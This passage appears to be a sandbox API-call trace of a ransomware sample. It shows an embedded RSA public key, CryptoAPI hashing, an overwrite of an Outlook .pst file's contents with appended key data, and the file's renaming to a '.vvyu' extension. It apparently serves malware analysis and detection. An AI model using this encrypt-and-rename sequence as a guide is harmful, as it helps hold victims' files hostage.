KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.797] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.799] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.799] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.799] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.799] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.799] GetLastError () returned 0x0 [0192.799] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.799] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.800] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.800] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.800] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25810) returned 0x2af5168 [0192.801] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c48 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c90 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0192.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.803] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0192.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6248 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6230 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0192.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.806] GetCurrentThreadId () returned 0x5d8 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7698 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.807] GetCurrentThreadId () returned 0x5d8 [0192.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0192.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0192.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6248 [0192.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62a8 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62c0 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6260 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6230 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c90 | out: hHeap=0x2c0000) returned 1 [0192.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.818] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x25800, lpOverlapped=0x0) returned 1 [0192.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.820] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.820] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.927] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.928] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.928] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.928] CloseHandle (hObject=0x584) returned 1 [0192.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0192.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.933] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst.vvyu")) returned 1 [0192.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.936] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0192.939] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 0 [0192.939] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0192.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.939] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0192.939] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, 